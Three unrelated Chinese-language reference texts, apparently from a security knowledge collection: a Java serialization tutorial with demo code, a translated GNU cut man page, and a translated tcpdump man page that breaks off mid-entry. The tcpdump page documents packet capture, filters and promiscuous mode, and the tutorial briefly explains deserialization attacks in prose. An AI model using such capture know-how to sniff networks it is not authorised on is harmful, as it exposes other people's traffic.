# 序列化 --- 使用 Java 对象序列化,在保存对象时,会把其状态保存为一组字节,在未来,再将这些字节组装成对象。必须注意地是,对象序列化保存的是对象的”状态”,即它的成员变量。由此可知,对象序列化不会关注类中的静态变量。 序列化(serialize) - 序列化是将对象转换为字节流。 反序列化(deserialize) - 反序列化是将字节流转换为对象。 序列化用途 * 序列化可以将对象的字节序列持久化——保存在内存、文件、数据库中。 * 在网络上传送对象的字节序列。 * RMI(远程方法调用) Java 序列化和反序列化 Java 通过对象输入输出流来实现序列化和反序列化: * `java.io.ObjectOutputStream` 类的 `writeObject()` 方法可以实现序列化; * `java.io.ObjectInputStream` 类的 `readObject()` 方法用于实现反序列化。 序列化和反序列化示例: ```java import java.io.*; public class SerializeDemo01 { enum Sex { MALE, FEMALE } static class Person implements Serializable { private static final long serialVersionUID = 1L; private String name = null; private Integer age = null; private Sex sex; public Person() { } public Person(String name, Integer age, Sex sex) { this.name = name; this.age = age; this.sex = sex; } @Override public String toString() { return "Person{" + "name='" + name + '\'' + ", age=" + age + ", sex=" + sex + '}'; } } /** * 序列化 */ private static void serialize(String filename) throws IOException { File f = new File(filename); // 定义保存路径 OutputStream out = new FileOutputStream(f); // 文件输出流 ObjectOutputStream oos = new ObjectOutputStream(out); // 对象输出流 oos.writeObject(new Person("Jack", 30, Sex.MALE)); // 保存对象 oos.close(); out.close(); } /** * 反序列化 */ private static void deserialize(String filename) throws IOException, ClassNotFoundException { File f = new File(filename); // 定义保存路径 InputStream in = new FileInputStream(f); // 文件输入流 ObjectInputStream ois = new ObjectInputStream(in); // 对象输入流 Object obj = ois.readObject(); // 读取对象 ois.close(); in.close(); System.out.println(obj); } public static void main(String[] args) throws IOException, ClassNotFoundException { final String filename = "d:/text.dat"; serialize(filename); deserialize(filename); } } // Output: // Person{name='Jack', age=30, sex=MALE} ``` --- ## Serializable 接口 被序列化的类必须属于 Enum、Array 和 Serializable 类型其中的任何一种,否则将抛出 `NotSerializableException` 异常。这是因为:在序列化操作过程中会对类型进行检查,如果不满足序列化类型要求,就会抛出异常。 ```java public class UnSerializeDemo { static class Person { // 其他内容略 } // 其他内容略 } // Output: // Exception in thread "main" java.io.NotSerializableException: ``` ### serialVersionUID 请注意 `serialVersionUID` 字段,你可以在 Java 世界的无数类中看到这个字段。 `serialVersionUID` 有什么作用,如何使用 `serialVersionUID`? `serialVersionUID` 是 Java 为每个序列化类产生的版本标识。它可以用来保证在反序列时,发送方发送的和接受方接收的是可兼容的对象。如果接收方接收的类的 `serialVersionUID` 与发送方发送的 `serialVersionUID` 不一致,会抛出 `InvalidClassException`。 如果可序列化类没有显式声明 `serialVersionUID`,则序列化运行时将基于该类的各个方面计算该类的默认 `serialVersionUID` 值。尽管这样,还是建议在每一个序列化的类中显式指定 `serialVersionUID` 的值。因为不同的 jdk 编译很可能会生成不同的 `serialVersionUID` 默认值,从而导致在反序列化时抛出 `InvalidClassExceptions` 异常。 `serialVersionUID` 字段必须是 `static final long` 类型。 举个例子,有一个可序列化类 Person ```java public class Person implements Serializable { private static final long serialVersionUID = 1L; private String name; private Integer age; private String address; // 构造方法、get、set 方法略 } ``` 开发过程中,对 Person 做了修改,增加了一个字段 email,如下: ```java public class Person implements Serializable { private static final long serialVersionUID = 1L; private String name; private Integer age; private String address; private String email; // 构造方法、get、set 方法略 } ``` 由于这个类和老版本不兼容,我们需要修改版本号: ```java private static final long serialVersionUID = 2L; ``` 再次进行反序列化,则会抛出 `InvalidClassException` 异常。 综上所述,我们大概可以清楚:`serialVersionUID` 用于控制序列化版本是否兼容。若我们认为修改的可序列化类是向后兼容的,则不修改 `serialVersionUID`。 ### 默认序列化机制 如果仅仅只是让某个类实现 `Serializable` 接口,而没有其它任何处理的话,那么就会使用默认序列化机制。 使用默认机制,在序列化对象时,不仅会序列化当前对象本身,还会对其父类的字段以及该对象引用的其它对象也进行序列化。同样地,这些其它对象引用的另外对象也将被序列化,以此类推。所以,如果一个对象包含的成员变量是容器类对象,而这些容器所含有的元素也是容器类对象,那么这个序列化的过程就会较复杂,开销也较大。 ### transient 在现实应用中,有些时候不能使用默认序列化机制。比如,希望在序列化过程中忽略掉敏感数据,或者简化序列化过程。下面将介绍若干影响序列化的方法。 当某个字段被声明为 `transient` 后,默认序列化机制就会忽略该字段的内容,该字段的内容在序列化后无法获得访问。 我们将 SerializeDemo01 示例中的内部类 Person 的 age 字段声明为 `transient`,如下所示: ```java public class SerializeDemo02 { static class Person implements Serializable { transient private Integer age = null; // 其他内容略 } // 其他内容略 } // Output: // name: Jack, age: null, sex: MALE ``` 从输出结果可以看出,age 字段没有被序列化。 --- ## Externalizable 接口 无论是使用 `transient` 关键字,还是使用 `writeObject()` 和 `readObject()` 方法,其实都是基于 `Serializable` 接口的序列化。 JDK 中提供了另一个序列化接口 -- `Externalizable`。 可序列化类实现 `Externalizable` 接口之后,基于 `Serializable` 接口的默认序列化机制就会失效。 我们来基于 SerializeDemo02 再次做一些改动,代码如下: ```java public class ExternalizeDemo01 { static class Person implements Externalizable { transient private Integer age = null; // 其他内容略 private void writeObject(ObjectOutputStream out) throws IOException { out.defaultWriteObject(); out.writeInt(age); } private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { in.defaultReadObject(); age = in.readInt(); } @Override public void writeExternal(ObjectOutput out) throws IOException { } @Override public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException { } } // 其他内容略 } // Output: // call Person() // name: null, age: null, sex: null ``` 从该结果,一方面可以看出 Person 对象中任何一个字段都没有被序列化。另一方面,如果细心的话,还可以发现这此次序列化过程调用了 Person 类的无参构造方法。 `Externalizable` 继承于 `Serializable`,它增添了两个方法:`writeExternal()` 与 `readExternal()`。这两个方法在序列化和反序列化过程中会被自动调用,以便执行一些特殊操作。当使用该接口时,序列化的细节需要由程序员去完成。如上所示的代码,由于 `writeExternal()` 与 `readExternal()` 方法未作任何处理,那么该序列化行为将不会保存/读取任何一个字段。这也就是为什么输出结果中所有字段的值均为空。 另外,若使用 `Externalizable` 进行序列化,当读取对象时,会调用被序列化类的无参构造方法去创建一个新的对象;然后再将被保存对象的字段的值分别填充到新对象中。这就是为什么在此次序列化过程中 Person 类的无参构造方法会被调用。由于这个原因,实现 `Externalizable` 接口的类必须要提供一个无参的构造方法,且它的访问权限为 `public`。 对上述 Person 类作进一步的修改,使其能够对 `name` 与 `age` 字段进行序列化,但要忽略掉 `gender` 字段,如下代码所示: ```java public class ExternalizeDemo02 { static class Person implements Externalizable { transient private Integer age = null; // 其他内容略 private void writeObject(ObjectOutputStream out) throws IOException { out.defaultWriteObject(); out.writeInt(age); } private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { in.defaultReadObject(); age = in.readInt(); } @Override public void writeExternal(ObjectOutput out) throws IOException { out.writeObject(name); out.writeInt(age); } @Override public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException { name = (String) in.readObject(); age = in.readInt(); } } // 其他内容略 } // Output: // call Person() // name: Jack, age: 30, sex: null ``` ### Externalizable 接口的替代方法 实现 `Externalizable` 接口可以控制序列化和反序列化的细节。它有一个替代方法:实现 `Serializable` 接口,并添加 `writeObject(ObjectOutputStream out)` 与 `readObject(ObjectInputStream in)` 方法。序列化和反序列化过程中会自动回调这两个方法。 示例如下所示: ```java public class SerializeDemo03 { static class Person implements Serializable { transient private Integer age = null; // 其他内容略 private void writeObject(ObjectOutputStream out) throws IOException { out.defaultWriteObject(); out.writeInt(age); } private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { in.defaultReadObject(); age = in.readInt(); } // 其他内容略 } // 其他内容略 } // Output: // name: Jack, age: 30, sex: MALE ``` 在 `writeObject()` 方法中会先调用 `ObjectOutputStream` 中的 `defaultWriteObject()` 方法,该方法会执行默认的序列化机制,如上节所述,此时会忽略掉 age 字段。然后再调用 `writeInt()` 方法显示地将 age 字段写入到 `ObjectOutputStream` 中。`readObject()` 的作用则是针对对象的读取,其原理与 `writeObject()` 方法相同。 `writeObject()` 与 `readObject()` 都是 `private` 方法,那么它们是如何被调用的呢?毫无疑问,是使用反射。 详情可见 `ObjectOutputStream` 中的 `writeSerialData` 方法,以及 `ObjectInputStream` 中的 `readSerialData` 方法。 ### readResolve() 方法 当我们使用单例模式模式时,应该是期望某个类的实例应该是唯一的,但如果该类是可序列化的,那么情况可能会略有不同。此时对第 2 节使用的 Person 类进行修改,使其实现单例模式,如下所示: ```java public class SerializeDemo04 { enum Sex { MALE, FEMALE } static class Person implements Serializable { private static final long serialVersionUID = 1L; private String name = null; transient private Integer age = null; private Sex sex; static final Person instatnce = new Person("Tom", 31, Sex.MALE); private Person() { System.out.println("call Person()"); } private Person(String name, Integer age, Sex sex) { this.name = name; this.age = age; this.sex = sex; } public static Person getInstance() { return instatnce; } private void writeObject(ObjectOutputStream out) throws IOException { out.defaultWriteObject(); out.writeInt(age); } private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { in.defaultReadObject(); age = in.readInt(); } public String toString() { return "name: " + this.name + ", age: " + this.age + ", sex: " + this.sex; } } /** * 序列化 */ private static void serialize(String filename) throws IOException { File f = new File(filename); // 定义保存路径 OutputStream out = new FileOutputStream(f); // 文件输出流 ObjectOutputStream oos = new ObjectOutputStream(out); // 对象输出流 oos.writeObject(new Person("Jack", 30, Sex.MALE)); // 保存对象 oos.close(); out.close(); } /** * 反序列化 */ private static void deserialize(String filename) throws IOException, ClassNotFoundException { File f = new File(filename); // 定义保存路径 InputStream in = new FileInputStream(f); // 文件输入流 ObjectInputStream ois = new ObjectInputStream(in); // 对象输入流 Object obj = ois.readObject(); // 读取对象 ois.close(); in.close(); System.out.println(obj); System.out.println(obj == Person.getInstance()); } public static void main(String[] args) throws IOException, ClassNotFoundException { final String filename = "d:/text.dat"; serialize(filename); deserialize(filename); } } // Output: // name: Jack, age: null, sex: MALE // false ``` 值得注意的是,从文件中获取的 `Person` 对象与 `Person` 类中的单例对象并不相等。为了能在单例类中仍然保持序列的特性,可以使用 `readResolve()` 方法。在该方法中直接返回 `Person` 的单例对象。我们在 `SerializeDemo04` 示例的基础上添加一个 `readResolve` 方法, 如下所示: ```java public class SerializeDemo05 { // 其他内容略 static class Person implements Serializable { // private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { // in.defaultReadObject(); // age = in.readInt(); // } // 添加此方法 private Object readResolve() { return instatnce; } // 其他内容略 } // 其他内容略 } // Output: // name: Tom, age: 31, sex: MALE // true ``` --- ## Java 序列化问题 Java 的序列化能保证对象状态的持久保存,但是遇到一些对象结构复杂的情况还是难以处理,这里归纳一下: * 父类是 `Serializable` ,所有子类都可以被序列化。 * 子类是 `Serializable` ,父类不是,则子类可以正确序列化,但父类的属性不会被序列化(不报错,数据丢失)。 * 如果序列化的属性是对象,则这个对象也必须是 Serializable ,否则报错。 * 反序列化时,如果对象的属性有修改或删减,则修改的部分属性会丢失,但不会报错。 * 反序列化时,如果 serialVersionUID 被修改,则反序列化会失败。 --- ## Java 序列化的缺陷 * 无法跨语言:Java 序列化目前只适用基于 Java 语言实现的框架,其它语言大部分都没有使用 Java 的序列化框架,也没有实现 Java 序列化这套协议。因此,如果是两个基于不同语言编写的应用程序相互通信,则无法实现两个应用服务之间传输对象的序列化与反序列化。 * 容易被攻击:对象是通过在 `ObjectInputStream` 上调用 `readObject()` 方法进行反序列化的,它可以将类路径上几乎所有实现了 Serializable 接口的对象都实例化。这意味着,在反序列化字节流的过程中,该方法可以执行任意类型的代码,这是非常危险的。对于需要长时间进行反序列化的对象,不需要执行任何代码,也可以发起一次攻击。攻击者可以创建循环对象链,然后将序列化后的对象传输到程序中反序列化,这种情况会导致 `hashCode` 方法被调用次数呈次方爆发式增长, 从而引发栈溢出异常。 * 序列化后的流太大:Java 序列化中使用了 `ObjectOutputStream` 来实现对象转二进制编码,编码后的数组很大,非常影响存储和传输效率。 * 序列化性能太差:Java 的序列化耗时比较大。序列化的速度也是体现序列化性能的重要指标,如果序列化的速度慢,就会影响网络通信的效率,从而增加系统的响应时间。 * 序列化编程限制: * Java 官方的序列化一定需要实现 `Serializable` 接口。 * Java 官方的序列化需要关注 `serialVersionUID`。 --- ## Source & Reference - https://dunwu.github.io/javacore/io/java-serialization.html
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH CUT 1 2022年9月 "GNU coreutils 9.1" 用户命令 .SH 名称 cut \- 从文件的每一行中移除某些段 .SH 概述 \fBcut\fP \fI\,选项\/\fP... [\fI\,文件列表\/\fP]... .SH 描述 .\" Add any additional description here .PP 从每个输入文件中输出指定部分到标准输出。 .PP 如果没有指定文件,或者指定文件为“\-”,则从标准输入读取。 .PP 必选参数对长短选项同时适用。 .TP \fB\-b\fP, \fB\-\-bytes\fP=\fI\,列表\/\fP 只选中指定的这些字节 .TP \fB\-c\fP, \fB\-\-characters\fP=\fI\,列表\/\fP 只选中指定的这些字符 .TP \fB\-d\fP, \fB\-\-delimiter\fP=\fI\,分界符\/\fP 使用指定分界符代替制表符作为区域分界 .TP \fB\-f\fP, \fB\-\-fields\fP=\fI\,列表\/\fP 只选中指定的这些域;并打印所有不包含分界符的行,除非同时指定了 \fB\-s\fP 选项 .TP \fB\-n\fP (被忽略的选项) .TP \fB\-\-complement\fP 补全选中的字节、字符或域 .TP \fB\-s\fP, \fB\-\-only\-delimited\fP do not print lines not containing delimiters .TP \fB\-\-output\-delimiter\fP=\fI\,STRING\/\fP use STRING as the output delimiter the default is to use the input delimiter .TP \fB\-z\fP, \fB\-\-zero\-terminated\fP 以 NUL 空字符而非换行符作为行分隔符 .TP \fB\-\-help\fP 显示此帮助信息并退出 .TP \fB\-\-version\fP 显示版本信息并退出 .PP Use one, and only one of \fB\-b\fP, \fB\-c\fP or \fB\-f\fP. Each LIST is made up of one range, or many ranges separated by commas. Selected input is written in the same order that it is read, and is written exactly once. Each range is one of: .TP N 第 N 个字节、字符或字段(从 1 开始数) .TP N\- 从第 N 个字符、字节或字段,到行末 .TP N\-M 从第 N 个到第 M 个(包括第 M 个)字符、字节或字段 .TP \fB\-M\fP 从第 1 个到第 M 个(包括第 M 个)字符、字节或字段 .SH 作者 由 David M. Ihnat、David MacKenzie 和 Jim Meyering 编写。 .SH 报告错误 GNU coreutils 的在线帮助: <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误。 .SH 版权 Copyright \(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件:您可以自由修改和重新发布它。在法律允许的范围内,不提供任何保证。 .SH 参见 完整文档请见: <https://www.gnu.org/software/coreutils/cut> .br 或者在本地使用: info \(aq(coreutils) cut invocation\(aq
sec-knowleage
.\" Copyright (c) 1987, 1988, 1989, 1990, 1991, 1992, 1994, 1995, 1996, 1997 .\" The Regents of the University of California. All rights reserved. .\" All rights reserved. .\" .\" Redistribution and use in source and binary forms, with or without .\" modification, are permitted provided that: (1) source code distributions .\" retain the above copyright notice and this paragraph in its entirety, (2) .\" distributions including binary code include the above copyright notice and .\" this paragraph in its entirety in the documentation or other materials .\" provided with the distribution, and (3) all advertising materials mentioning .\" features or use of this software display the following acknowledgement: .\" ``This product includes software developed by the University of California, .\" Lawrence Berkeley Laboratory and its contributors.'' Neither the name of .\" the University nor the names of its contributors may be used to endorse .\" or promote products derived from this software without specific prior .\" written permission. .\" THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED .\" WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF .\" MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. .\" .TH TCPDUMP 8 "30 June 1997" .SH NAME tcpdump \- 转储网络上的数据流 .SH 总览 (SYNOPSIS) .na .B tcpdump [ .B \-adeflnNOpqStvx ] [ .B \-c .I count ] [ .B \-F .I file ] .br .ti +8 [ .B \-i .I interface ] [ .B \-r .I file ] [ .B \-s .I snaplen ] .br .ti +8 [ .B \-T .I type ] [ .B \-w .I file ] [ .I expression ] .br .ad .SH 描述 (DESCRIPTION) .LP \fITcpdump\fP 打印出 在某个 网络界面 上, 匹配 布尔表达式 \fIexpression\fP 的报文 的 报头. .LP .B 对于 SunOS 的 nit 或 bpf 界面: 要 运行 .I tcpdump , 你 必须 有 .I /dev/nit 或 .IR /dev/bpf* 的 读访问 权限. .B 对于 Solaris 的 dlpi: 你 必须 有 网络仿真设备 (network pseudo device), 如 .IR /dev/le 的 读访问 权限. .B 对于 HP-UX 的 dlpi: 你 必须 是 root, 或者 把它 安装成 root 的 设置uid 程序. .B 对于 IRIX 的 snoop: 你 必须 是 root, 或者 把它 安装成 root 的 设置uid 程序. .B 对于 Linux: 你 必须 是 root, 或者 把它 安装成 root 的 设置uid 程序. .B 对于 Ultrix 和 Digital UNIX: 一旦 超级用户 使用 .IR pfconfig (8) 开放了 promiscuous 操作模式 (promiscuous-mode), 任何用户 都可以 运行 .BR tcpdump . .B 对于 BSD: 你 必须 有 .IR /dev/bpf* 的 读访问 权限. .SH 选项 (OPTIONS) .TP .B \-a 试着 把 网络和广播地址 转换成 名称. .TP .B \-c 当 收到 \fIcount\fP 报文 后 退出. .TP .B \-d 把 编译好的 报文匹配代码 (packet-matching code) 翻译成 可读形式, 传往 标准输出, 然后退出. .TP .B \-dd 把 报文匹配代码 (packet-matching code) 以 .B C 程序片断 的 形式 输出. .TP .B \-ddd 把 报文匹配代码 (packet-matching code) 以 十进制数 形式 输出 (前面 加上 总数). .TP .B \-e 显示 链路层报头. .TP .B \-f 以 数字形式 显示 '外部的' 互联网地址, 而不是 字符形式 (这个 选项 用来 绕开 脑壳坏光的 SUN 黄页服务器 的 问题 \(em 一般说来 当它 翻译 外部网络 的 数字地址 时 会长期挂起). .TP .B \-F 把 \fIfile\fP 的内容 用作 过滤表达式. 忽略 命令行 上 的 表达式. .TP .B \-i 监听 \fIinterface\fP. 如果 不指定 接口, \fItcpdump\fP 在 系统 的 接口 清单 中, 寻找 号码最小, 已经 配置好的 接口 (loopback 除外). 选中的时候 会 中断 连接. .TP .B \-l 行缓冲 标准输出. 可用于 捕捉 数据 的 同时 查看 数据. 例如, .br ``tcpdump\ \ \-l\ \ |\ \ tee dat'' or ``tcpdump\ \ \-l \ \ > dat\ \ &\ \ tail\ \ \-f\ \ dat''. .TP .B \-n 不要把 地址 转换成 名字 (指的是 主机地址, 端口号等) .TP .B \-N 不显示 主机名字 中的 域名 部分. 例如, 如果 使用 这个 选项, \fItcpdump\fP 只显示 ``nic'', 而不是 ``nic.ddn.mil''. .TP .B \-O 禁止运行 报文匹配代码 的 优化器. 这个选项 只有 当你 怀疑 优化器 有 bug 时 才有用. .TP .B \-p \fI禁止\fP 把 接口 置成 promiscuous(杂凑) 模式. 注意, 接口 有可能 因 其他原因 而 处于 promiscuous 模式; 因此, '-p' 不能 作为 `ether host {local-hw-addr} 或 ether broadcast' 的 简写. .TP .B \-q 快速输出. 显示 较少的 协议信息, 输出行 会 短一点点. .TP .B \-r 从 \fIfile\fR 中 读入 数据报 (文件 是用 -w 选项 创建的). 如果 \fIfile\fR 是 ``-'', 就从 标准输入 读入. .TP .B \-s 从每个 报文 中 截取 \fIsnaplen\fP 字节的数据, 而不是 缺省的 68 (如果是 SunOS 的 NIT, 最小值是 96). 68 个字节 适用于 IP, ICMP, TCP 和 UDP, 但是 有可能 截掉 名字服务器 和 NFS 报文 的 协议 信息 (见下文). 输出时 如果指定 ``[|\fIproto\fP]'', tcpdump 可以 指出 那些 捕捉量过小 的 数据报, 这里的 \fIproto\fP 是 截断发生处 的 协议层 名称. 注意, 采用 更大的 捕捉范围 不但 增加了 处理 报文 的 时间, 而且 减少了 报文的 缓冲 数量, 可能 导致 报文的丢失. 你 应该 把 \fIsnaplen\fP 设的 尽量小, 只要 能够 容纳 你 需要 的 协议信息 就可以了. .TP .B \-T 把 通过 "\fIexpression\fP" 挑选出来的 报文 解释成 指定的 \fItype\fR. 目前 已知 的 类型 有: \fBrpc\fR (远程过程调用 Remote Procedure Call), \fBrtp\fR (实时应用协议 Real-Time Applications protocol), \fBrtcp\fR (实时应用控制协议 Real-Time Applications control protocol), \fBvat\fR (可视音频工具 Visual Audio Tool), 和 \fBwb\fR (分布式白板 distributed White Board). .TP .B \-S 显示 绝对的, 而不是 相对的 TCP 流序号. .TP .B \-t \fI禁止\fP 显示 时戳标志. .TP .B \-tt 显示 未格式化的 时戳标志. .TP .B \-v (稍微多一点) 繁琐的输出. 例如, 显示 IP 数据报 中的 生存周期 和 服务类型. .TP .B \-vv 更繁琐的输出. 例如, 显示 NFS 应答报文 的 附加域. .TP .B \-w 把 原始报文 存进 \fIfile\fR, 不做 分析 和 显示. 它们 可以 以后 用 \-r 选项 显示. 如果 \fIfile\fR 是 ``-'', 就 写往 标准输出. .TP .B \-x 以 16 进制数 形式 显示 每一个 报文 (去掉链路层报头后) . 可以 显示 较小的 完整 报文, 否则 只 显示 .I snaplen 个 字节 . .IP "\fIexpression\fP" .RS 用来 选择 要 转储 的 数据报. 如果 没有 指定 \fIexpression\fP , 就 转储 网络的 全部 报文. 否则, 只转储 相对 \fIexpression\fP 为 `true' 的 数据报. .LP \fIexpression\fP 由 一个或多个 .I 原语 (primitive) 组成. 原语 通常 由 一个 .I 标识 (id, 名称或数字), 和 标识 前面的 一个或多个 修饰子(qualifier) 组成. 修饰子 有 三种 不同的类型: .IP \fItype\fP 类型修饰子 指出 标识名称 或 标识数字 代表 什么 类型的东西. 可以使用的 类型 有 .BR host , .B net 和 .BR port . 例如, `host foo', `net 128.3', `port 20'. 如果 不指定 类型修饰子, 就使用 缺省的 .B host . .IP \fIdir\fP 方向修饰子 指出 相对于 .B 标识 的 传输方向 (数据是 传入还是传出 标识). 可以使用的 方向 有 .BR src , .BR dst , .B "src or dst" 和 .B "src and" .BR dst . 例如, `src foo', `dst net 128.3', `src or dst port ftp-data'. 如果 不指定 方向修饰子, 就使用 缺省的 .B "src or dst" . 对于 `null' 链路层 (就是说 象 slip 之类的 点到点 协议), 用 .B inbound 和 .B outbound 修饰子 指定 所需的 传输方向. .IP \fIproto\fP 协议修饰子 要求 匹配 指定的协议. 可以使用的 协议 有: .BR ether , .BR fddi , .BR ip , .BR arp , .BR rarp , .BR decnet , .BR lat , .BR sca , .BR moprc , .BR mopdl , .B tcp 和 .BR udp . 例如, `ether src foo', `arp net 128.3', `tcp port 21'. 如果 不指定 协议修饰子, 就使用 所有 符合 类型 的 协议. 例如, `src foo' 指 `(ip 或 arp 或 rarp) src foo' (注意后者不符合语法), `net bar' 指 `(ip 或 arp 或 rarp) net bar', `port 53' 指 `(tcp 或 udp) port 53'. .LP [`fddi' 实际上 是 `ether' 的 别名; 分析器 把 它们 视为 ``用在 指定 网络接口 上的 数据链路层.'' FDDI 报头 包含 类似于 以太协议 的 源目地址, 而且 通常 包含 类似于 以太协议 的 报文类型, 因此 你 可以 过滤 FDDI 域, 就象 分析 以太协议 一样. FDDI 报头 也 包含 其他 域, 但是 你 不能 在 过滤器 表达式 里 显式描述.] .LP 作为 上述 的 补充, 有一些 特殊的 `原语' 关键字: .BR gateway , .BR broadcast , .BR less , .B greater 和 数学表达式. 它们 不同于 上面的模式, 这些 在 后面 有 叙述. .LP 更复杂的 过滤器表达式 可以 通过 .BR and , .B or 和 .B not 连接 原语 来 组建. 例如, `host foo and not port ftp and not port ftp-data'. 为了少敲点键, 可以忽略 相同的 修饰子. 例如, `tcp dst port ftp or ftp-data or domain' 实际上 就是 `tcp dst port ftp or tcp dst port ftp-data or tcp dst port domain'. .LP 允许的 原语 有: .IP "\fBdst host \fIhost\fR" 如果 报文中 IP 的 目的地址域 是 \fIhost\fP, 则 逻辑 为 真. \fIhost\fP 既可以 是 地址, 也可以 是 主机名. .IP "\fBsrc host \fIhost\fR" 如果 报文中 IP 的 源地址域 是 \fIhost\fP, 则 逻辑 为 真. .IP "\fBhost \fIhost\fP 如果 报文中 IP 的 源地址域 或者 目的地址域 是 \fIhost\fP, 则 逻辑 为 真. 上面 所有的 host 表达式 都可以 加上 \fBip\fP, \fBarp\fP, 或 \fBrarp\fP 关键字 做 前缀, 就象: .in +.5i .nf \fBip host \fIhost\fR .fi .in -.5i 它等价于: .in +.5i .nf \fBether proto \fI\\ip\fB and host \fIhost\fR .fi .in -.5i 如果 \fIhost\fR 是 拥有 多个 IP 地址 的 主机名, 它的 每个地址 都会 被查验. .IP "\fBether dst \fIehost\fP 如果 报文的 以太目的地址 是 \fIehost\fP, 则 逻辑 为 真. \fIEhost\fP 既可以是 名字 (/etc/ethers 里有), 也可以是 数字 (有关 数字格式 另见 .IR ethers (3N) ). .IP "\fBether src \fIehost\fP 如果 报文的 以太源地址 是 \fIehost\fP, 则 逻辑 为 真. .IP "\fBether host \fIehost\fP 如果 报文的 以太源地址 或 以太目的地址 是 \fIehost\fP, 则 逻辑 为 真. .IP "\fBgateway\fP \fIhost\fP 如果 报文 把 \fIhost\fP 当做 网关, 则 逻辑 为 真. 也就是说, 报文的 以太源或目的地址 是 \fIhost\fP, 但是 IP 的 源目地址 都不是 \fIhost\fP. \fIhost\fP 必须 是个 主机名, 而且 必须 存在 /etc/hosts 和 /etc/ethers 中. (一个等价的表达式是 .in +.5i .nf \fBether host \fIehost \fBand not host \fIhost\fR .fi .in -.5i 对于 \fIhost / ehost\fP, 它既可以是 名字, 也可以是 数字.) .IP "\fBdst net \fInet\fR" 如果 报文的 IP 目的地址 属于 网络号 \fInet\fP, 则 逻辑 为 真. \fInet\fP 既可以 是 名字 (存在 /etc/networks 中), 也可以是 网络号. (详见 \fInetworks(4)\fP). .IP "\fBsrc net \fInet\fR" 如果 报文的 IP 源地址 属于 网络号 \fInet\fP, 则 逻辑 为 真. .IP "\fBnet \fInet\fR" 如果 报文的 IP 源地址 或 目的地址 属于 网络号 \fInet\fP, 则 逻辑 为 真. .IP "\fBnet \fInet\fR \fBmask \fImask\fR" 如果 IP 地址 匹配 指定 网络掩码(netmask) 的 \fInet\fR, 则 逻辑 为 真. 本原语 可以用 \fBsrc\fR 或 \fBdst\fR 修饰. .IP "\fBnet \fInet\fR/\fIlen\fR" 如果 IP 地址 匹配 指定 网络掩码 的 \fInet\fR, 则 逻辑 为 真, 掩码 的 有效位宽 为 \fIlen\fR. 本原语 可以用 \fBsrc\fR 或 \fBdst\fR 修饰. .IP "\fBdst port \fIport\fR" 如果 报文 是 ip/tcp 或 ip/udp, 并且 目的端口 是 \fIport\fP, 则 逻辑 为 真. \fIport\fP 是一个 数字, 也可以是 /etc/services 中 说明过的 名字 (参看 .IR tcp (4P) 和 .IR udp (4P)). 如果 使用 名字, 则 检查 端口号 和 协议. 如果 使用 数字, 或者 有二义的名字, 则 只检查 端口号 (例如, \fBdst port 513\fR 将显示 tcp/login 的数据 和 udp/who 的数据, 而 \fBport domain\fR 将显示 tcp/domain 和 udp/domain 的数据). .IP "\fBsrc port \fIport\fR" 如果 报文 的 源端口号 是 \fIport\fP, 则 逻辑 为 真. .IP "\fBport \fIport\fR" 如果 报文 的 源端口 或 目的端口 是 \fIport\fP, 则 逻辑 为 真. 上述的 任意一个 端口表达式 都可以 用 关键字 \fBtcp\fP 或 \fBudp\fP 做 前缀, 就象: .in +.5i .nf \fBtcp src port \fIport\fR .fi .in -.5i 它 只匹配 源端口 是 \fIport\fP 的 TCP 报文. .IP "\fBless \fIlength\fR" 如果 报文 的 长度 小于等于 \fIlength\fP, 则 逻辑 为 真. 它等同于: .in +.5i .nf \fBlen <= \fIlength\fP. .fi .in -.5i .IP "\fBgreater \fIlength\fR" 如果 报文 的 长度 大于等于 \fIlength\fP, 则 逻辑 为 真. 它等同于: .in +.5i .nf \fBlen >= \fIlength\fP. .fi .in -.5i .IP "\fBip proto \fIprotocol\fR" 如果 报文 是 IP 数据报(参见 .IR ip (4P)) , 其 内容 的 协议类型 是 \fIprotocol\fP, 则 逻辑 为 真. \fIProtocol\fP 可以是 数字, 也可以是 下列 名称 中的 一个: \fIicmp\fP, \fIigrp\fP, \fIudp\fP, \fInd\fP, 或 \fItcp\fP. 注意 这些 标识符 \fItcp\fP, \fIudp\fP, 和 \fIicmp\fP 也是 关键字, 所以 必须 用 反斜杠(\\) 转义, 在 C-shell 中 应该是 \\\\ . .IP "\fBether broadcast\fR" 如果 报文 是 以太广播报文, 则 逻辑 为 真. 关键字 \fIether\fP 是 可选的. .IP "\fBip broadcast\fR" 如果 报文 是 IP广播报文, 则 逻辑 为 真. Tcpdump 检查 全0 和 全1 广播约定, 并且 检查 本地 的 子网掩码. .IP "\fBether multicast\fR" 如果 报文 是 以太多目传送报文(multicast), 则 逻辑 为 真. 关键字 \fIether\fP 是 可选的. 这实际上 是 `\fBether[0] & 1 != 0\fP' 的简写. .IP "\fBip multicast\fR" 如果 报文 是 IP多目传送报文, 则 逻辑 为 真. .IP "\fBether proto \fIprotocol\fR" 如果 报文协议 属于 以太类型 的 \fIprotocol\fR, 则 逻辑 为 真. \fIProtocol\fP 可以是 数字, 也可以是 名字, 如 \fIip\fP, \fIarp\fP, 或 \fIrarp\fP. 注意 这些 标识符 也是 关键字, 所以 必须 用 反斜杠(\\) 转义. [如果是 FDDI (例如, `\fBfddi protocol arp\fR'), 协议 标识 来自 802.2 逻辑链路控制(LLC)报头, 它 通常 位于 FDDI 报头 的 顶层. 当 根据 协议标识 过滤 报文 时, \fITcpdump\fP 假设 所有的 FDDI 报文 含有 LLC 报头, 而且 LLC 报头 用的是 SNAP 格式.] .IP "\fBdecnet src \fIhost\fR" 如果 DECNET 的 源地址 是 .IR host , 则 